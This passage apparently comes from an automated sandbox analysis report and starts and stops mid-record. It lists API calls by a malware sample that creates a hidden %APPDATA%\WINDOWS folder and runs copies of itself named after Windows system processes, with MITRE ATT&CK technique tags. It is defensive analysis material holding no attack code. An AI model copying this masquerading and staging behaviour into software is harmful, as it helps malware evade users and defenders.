\"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003332)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000964)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000964)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000964)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000964)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000964)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005724)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005724)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005724)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005724)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005724)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005724)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004188)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004188)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004188)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004188)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004188)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004188)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004188)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004188)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004248)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004248)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006052)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004308)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004308)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006084)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006084)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006084)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006084)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006084)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003580)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003580)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003580)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003580)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003580)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004240)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003616)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003616)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003616)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003616)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003616)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003616)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003616)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003616)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003616)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003616)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003456)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003456)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003456)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003456)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003456)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003792)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003792)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003792)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003792)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003792)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003792)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003792)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004416)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004500)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004500)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004500)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004500)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004500)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004500)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004500)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004500)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001888)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001888)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001888)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001888)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001888)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001888)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002176)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004512)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004512)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004512)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004512)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004512)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004512)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003880)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003880)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003880)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003880)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003880)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003880)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003880)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003880)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003880)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004104)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003012)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003012)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000296)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000296)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000296)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000296)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000296)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000296)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002640)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003812)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004652)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004652)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004652)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004652)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004652)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004652)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00000960)\n \"D3_08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005992)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00001712)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005792)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005760)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003332)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004392)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004268)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00000960)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005992)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005992)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005992)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005992)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter 